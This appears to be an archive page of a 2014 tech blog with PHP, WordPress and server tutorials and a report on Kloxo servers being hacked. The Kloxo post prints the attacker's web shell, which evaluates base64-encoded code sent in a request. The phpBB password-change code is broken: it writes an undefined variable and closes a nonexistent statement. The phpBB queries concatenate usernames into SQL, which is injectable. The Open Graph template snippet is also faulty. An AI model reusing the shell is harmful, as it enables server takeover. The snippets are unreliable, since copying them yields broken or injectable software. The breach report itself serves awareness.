Wednesday, December 10, 2014

How To Secure Roundcube Installation Of Virtualmin

Roundcube Logo


Roundcube is a PHP open source webmail that allow users to read and send emails through a user-friendly interface.

Thursday, November 13, 2014

How to Disable InnoDB On MySQL 5.5 and MariaDB


Disabling InnoDB

InnoDB is a MySQL storage engine. As of MySQL 5.5, InnoDB became the default storage engine instead of MyISAM.
Disabling InnoDB can be helpful, especially on low end boxes which has a low amount of memory.

Saturday, November 1, 2014

Protecting Owncloud Against Bruteforce Attacks With Fail2ban


OwnCloud is a great web application that can be installed on a server and allows the sync & share of files, music, movies, calendar and contacts. However, one weakness that ownCloud users face is a brute force attack against the login page.

Fail2Ban is a software that scan logs for malicious behaviors and update the firewall rules by banning IPs for a specified amount of time.

Sunday, October 12, 2014

Installing Varnish With Virtualmin

Varnish Logo

What is Varnish


Varnish is an HTTP accelerator and a reverse proxy caching web application.

Varnish is usually installed in front of the webserver such as Apache and Nginx, and cache their content in order to deliver it fast when a request is made.

Tuesday, September 9, 2014

phpBB API - Accessing Database and Performing Sql Queries

phpBB Logo

In my two previous posts, phpBB API - Logging In And Logging Out a User and phpBB API - Auto Login a User Without a Password, I used phpBB API to perform some API functionalities such as logging in a user without a password and logging out a user.

In this post, I will use the phpBB API to perform some SQL queries on the phpBB database to change the user's password and verify a user.

Changing a User's Password

<?php
define('IN_PHPBB', true);//Must be defined
$phpbb_root_path = '../phpBB3/';//your forum directory location
$phpEx = substr(strrchr(__FILE__, '.'), 1);
require_once($phpbb_root_path . 'common.' . $phpEx);

function phpbbChangePassword($username, $newPassword)
{
    global $phpbb_root_path, $phpEx, $user, $db,$table_prefix;
    $newPassword = phpbb_hash($newPassword);

    $sql = "UPDATE `" . $table_prefix . "users` SET user_password = '" . $password . "' WHERE username = '" . $username . "'"; 
    $db->sql_query($sql);
    $stmt->close();
}

//Changing Password for user "Test"
$username = "Test";
$newPassword = "myNewPassword";
phpbbChangePassword($username, $newPassword);

?>

Changing user's status to verified

<?php
define('IN_PHPBB', true);//Must be defined
$phpbb_root_path = '../phpBB3/';//your forum directory location
$phpEx = substr(strrchr(__FILE__, '.'), 1);
require_once($phpbb_root_path . 'common.' . $phpEx);


function phpbbVerifyUser($username)
{
    global $phpbb_root_path, $phpEx, $user, $db, $table_prefix;
    $userType = USER_NORMAL;
    $sql = "UPDATE `" . $table_prefix . "users` SET user_type = '" . $userType . "' WHERE username = '" . $username . "'"; 
    $db->sql_query($sql); 
}

//Verifying User "Test"
$username = "Test";
phpbbVerifyUser($username);

?>



Any questions, please let me know!

Friday, August 15, 2014

phpBB API - Auto Login a User Without a Password

phpBB Logo


In my previous post, phpBB API - Logging In And Logging Out a User, I showed how to login a user to phpBB forum using their username and password.

However in some cases, you may want to login a user without having or knowing their password.

phpBB API provides a method to auto login users by just knowing their phpBB ID.
This can be useful if you have a website connected to phpBB forum and you're only storing the usernames or IDs in that database. Or if you are implementing a Facebook Login Button on your website and you want to synchronize the session with your phpBB forum.

<?php
define('IN_PHPBB', true);//Must be defined
$phpbb_root_path = '../phpBB3/';//your forum directory location
$phpEx = substr(strrchr(__FILE__, '.'), 1);
require_once($phpbb_root_path . 'common.' . $phpEx);

function phpbbAutoLogin($id)
{
    global $phpbb_root_path, $phpEx, $user;

    $user->session_kill(false);//Logout the User - For testing
    $user->session_begin(); //Start Session
    $user->session_create($id); //Create Session

    //Check if User has successfully Logged in
    if($user->data['is_registered']==1 && $user->data['user_type'] != USER_INACTIVE && $user->data['user_type'] != USER_IGNORE)
    {
        echo  $user->data['username'] . ' has logged in';
    }
    else
    {
        echo 'Error Logging In';
    }
}

//Auto Login User with phpBB User ID 52
phpbbAutoLogin(52);
?>

Questions? Please let me know!

Monday, August 4, 2014

phpBB API - Logging In And Logging Out a User


phpbb Logo

What is PHPBB3

phpBB is an open source forum software that is very easy to use and build communities. Most importantly it's totally free.

phpBB3 provides an API that can be used to automatically login a user from a PHP script.

Although most of the phpBB API functions are documented, however their Wiki lacks examples and can be a little bit difficult to get started.

If you would like to synchronize your website with a phpBB forum, you can use the phpBB sessions to authenticate users.

Include The Following

define('IN_PHPBB', true); //To be allowed to access the API files
$phpbb_root_path = '../phpBB3/'; //phpbb forum path
$phpEx = substr(strrchr(__FILE__, '.'), 1);
require_once($phpbb_root_path . 'common.' . $phpEx);
require_once($phpbb_root_path . 'includes/functions_display.' . $phpEx);

Logging in a User

function phpbbLogin($username, $password)
{
    global $phpbb_root_path, $phpEx, $user, $auth;

    $user->session_begin();
    $auth->acl($user->data);

    $auth->login($username, $password, true);

    if($user->data['is_registered']==1 && $user->data['user_type'] != USER_INACTIVE && $user->data['user_type'] != USER_IGNORE)
    {
        echo 'User is logged in';
    }
}

Logging out a User

function phpbbLogout()
{
    global $phpbb_root_path, $phpEx, $user;
    $user->session_kill(false);
    echo 'User is logged out';
}


Questions? Please ask!

Tuesday, June 24, 2014

New Google Registrar Offering Domain Registration


Google Logo

Google announced today that it will be offering domain registrations.

The domain registration is currently still in beta, and is invite only.

You can apply for an invite by following this link:

The domain name registration will cost $12 per year for dot com with free private whois and DNS among other features. 

In addition, customers will get up to 100 emails for their domain name and will be able to forward them to an existing email.

Big competitors like Godaddy will be facing a problem, specially that Google will be offering up to 100 free subdomains.

Google will also allow customers to manage all kind of records, such as A, AAAA, CNAME, MX, NS, PTR, SOA, SPF, SRV, TXT, and configure TTL and manage the nameservers.


Do you think Google domain registrations will compete with Godaddy and other Big registrars?

Sunday, June 1, 2014

Renaming Saved Images In WP Robot 4

WP Robot Logo

WP Robot is a wordpress plugin that will automatically fetch content from websites, social media and RSS and post them to your wordpress website.

Beside scraping the content, WP Robot can also save the images locally. However the saved images' file-name will remain similar to the aggregated image.

Modifying The Code

I will modify WP Robot code to save all the images to the server with the following format:title-websiteUrl-randomNumber

Open
wp-content/plugins/WPRobot4/func.php, around line 29

Replace
$file_array['name'] = basename($matches[0]);
with
$path_parts = pathinfo($matches[0]);
$file_array['name'] = str_replace(" ", "-", strtolower(get_the_title($insert))) . '-' .  str_replace('http://',"",get_site_url() ) . '-' . rand(0,time()/1000) . "." . $path_parts['extension'];
Changing the image file name to reflect the post title can help in terms of SEO in "images search", since search engine has less textual clues than when doing normal searches.


Any questions? Leave your comment below!

Thursday, May 1, 2014

Adding Facebook Open Graph (OG) Meta Tags On Blogger

Facebook Logo


Addding Open Graph Meta Tags on Facebook is straightforward.

Go to blogger Dashboard => Template => Edit HTML

On top of the code, find the <html> tag, it should look similar to this:
<html b:version='2' class='v2' expr:dir='data:blog.languageDirection' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='http://www.google.com/2005/gml/expr'>
 
Add the Facebook xml namespace by adding the following line inside the tag (Before the > character):
xmlns:og='http://ogp.me/ns#'
So the html tag should look similar to:
<html b:version='2' class='v2' expr:dir='data:blog.languageDirection' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='http://www.google.com/2005/gml/expr' xmlns:og='http://ogp.me/ns#'>

Before the </head> tag, paste the following:
<!-- Open Graph Meta Tags BEGIN -->
<meta expr:content='data:blog.pageName' property='og:title'/>
<b:if cond='data:blog.postImageUrl'>
</b:if>
<meta expr:content='data:blog.title' property='og:title'/>
<meta expr:content='data:blog.canonicalUrl' property='og:url'/>
<b:if cond='data:blog.metaDescription'>
  <meta expr:content='data:blog.metaDescription' property='og:description'/>
</b:if>
<!-- Open Graph Meta Tags END -->


That's it! Before testing your page on Facebook, Make sure to debug your page to re-cache your blog's info:
https://developers.facebook.com/tools/debug


Also please note, that many blogs provides the wrong information, by using "data:blog.postImageThumbnailUrl" instead of "data:blog.postImageUrl", which will result in the following error on Facebook debugger:

Provided og:image is not big enough. Please use an image that's at least 200x200 px.

In order to prevent this, you can use the code above, and make sure you have a picture on your blog post with at least 200x200 pixels.

Monday, April 28, 2014

Hiding Your IP Address Using SSH Tunneling Tutorial


PuTTY


So you want to hide your IP Address without using a VPN or turning your server to a proxy

This tutorial will show you how to tunnel your internet traffic from your browser to your server.

Requirements:

  1. Your own server with SSH access.
  2. PuTTY (Download PuTTY)

Creating a Tunnel:

Open PuTTY, and write the IP Address or Host Name and the corresponding port number: (Replace xxx.xxx.xxx.xxx by your IP)

PuTTY Session

Click on SSH => Tunnels on the left side under Category:
PuTTY Tunneling

Enter a random port number in "Source port" and choose dynamic under "Destination" and click "Add":

PuTTY Tunneling Port

Go Back to "Session" under category, and enter a name in "Saved Sessions" and save it, this step is not required but it's useful in order to load the settings and tunnel quickly next time you want to create a tunneling connection:

PuTTY Save Settings

Click "Open" in PuTTy, and go to your browser (I'll use Firefox), go to "Tools" => "Options" => "Advanced" => "Network" => "Settings".
Choose "manual proxy configuration" => and enter "localhost" in the Host field, and enter the port you used in PuTTy (in the above screenshots it's 33000). Make sure to choose "Socks v5":
Firefox Proxy Socks 5

Click OK, and go to whatismyipaddress.com and you should see your server's IP Address instead of your network's IP.

Happy Tunneling!


Any questions or suggestions? Please leave a comment below!





Tuesday, January 28, 2014

Kloxo Compromised & Hacked With an SQL Injection Vulnerability

Kloxo Hack

Kloxo is an open source free web hosting platform that helps a server administrator manage their webservers, database servers, DNS servers and much more using a graphical user interface.

Kloxo is now outdated, and the last issued update was over two years ago.

After zPanel appeared to be vulnerable last month, it seems that Kloxo, which is another free Control Panel is the today's victim.

According to VPSBoard, Kloxo is spawning a huge number of httpd processes and sending out large volumes of traffic as part of a DDOS.

The affected targets are getting their Kloxo installations hacked with SQL Injection through webcommand.php file which is granting the attacker Kloxo admin access.

The attacker is then injecting a file called default.php into every Kloxo account through display.php, and changing the owner of the default.php to root.

The injected default.php contains the following code:
<?php
set_time_limit(0);error_reporting(NULL);
if(($_REQUEST['8ba7afbaaddc67de33a3f'])!=NULL){eval(base64_decode($_REQUEST['8ba7afbaaddc67de33a3f']));}
else{echo '<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title></title></head><body>Access denied.</body ></html >';}
?>
The above code is basically taking an encoded variable that contains a code written by the attacker. The code will be decoded and executed on the server. Just imagine all the fun you can have with someone's server if you are able to execute any command you wish.

As a security measure, it's advised to remove your Kloxo Control Panel and replace it by a up to date Panel.

A good easy to use free control panel that is gaining a lot of popularity lately is: VestaCP
If you want a more complicated free control panel to manage your virtual hosts and servers, you can always go with Virtualmin.


Monday, January 6, 2014

Connecting to VNC Server Securely With Putty On Windows


putty vnc windows ssh tunneling


In my previous post Installing VNC Server on CentOS, I showed you how to install, configure and connect to a VNC Server on CentOS. However, this connection from the client to the server is not secure, and the password sent to the server is sent as plain text over an unsecure channel.

In order to secure the VNC connection and encrypt all the data sent, SSH tunneling can be used to prevent the data from being sent as plain text from the client to the server.

SSH Tunneling can be easily created with Putty on windows. Putty can be downloaded from here.

Open Putty, and write the IP address or hostname of the server:
Putty Open Session

Go to SSH => Auth => Tunnels and write the IP Address and port number of your VNC server and click Add.
Note: All VNC ports start with 590X, where X is the number that you defined on your server in /etc/sysconfig/vncserver. In my example, I'll assume I assigned the number 5 as my port, so the port in Putty will be 5905. (Make sure your replace xxx.xxx.xxx.xxx by your real server ip or hostname).

Putty Tunneling Configuration

Now either click "Open", or go Back to  "Session" and save the session, so that you don't have to re-write the info everytime.
After clicking open, login to your server and make sure you have your VNC server installed and started.
service vncserver restart

Open your VNC Viewer client, and write your localhost IP (always 127.0.0.1) followed by the port number as follows (port number is 5 in my case), and click Connect:

vnc viewer

Enter your VNC password and click OK. Your connection to the server should be tunneled and secured.



Any questions or suggestions? Please leave a comment below!



Sunday, January 5, 2014

Renaming Locally Saved Image Names In FeedWordPress Advanced Filters


Feedwordpress


FeedWordPress Advanced Filters

FeedWordPress Advanced Filters (FAF) is a Wordpress plugin and an extension for FeedWordPress plugin. FAF has many important features, such as the ability to remove specific keywords or HTML tags, save images locally with or without a pre-defined size, setting featured images and much more.

When the images are saved locally, they maintain their original name from the original website. Sometimes this name consists of random characters, a long series of numbers or the original websites name.

Modifying The Code

All this can be changed easily by modifying one line of the code. What I'm going to do is change the name of the image to the following format:

postTitle-websiteName-randomNumber.ImgExtension
For example:
Renaming-Locally-Saved-Image-Names-tech-and-dev-123.jpg

To apply the changes, open /wp-content/plugins/faf/filters/image_filters.php with a text editor, and scroll down to line 423 (in version 0.6), or search for the following line:

$filename = $pathinfo["filename"] . "." . $imgext;

And change it to:

$filename = strtolower(str_replace(" ", "-", $post["post_title"])) . '-' . str_replace('http://',"",get_site_url() ) . '-' . rand(0,time()/1000) . "." . $imgext;

Save the file and upload if necessary.

The first part will rename the image as same as the post title but in lowercase and replace the spaces with dashes. The second part will append the website URL without the http:// part. The third part will generate a random number based on the current time. While the fourth part will append the image extension to the filename.

This method can also help the on-page SEO by giving the images a clear and descriptive name.

Any questions? Please leave your comment below!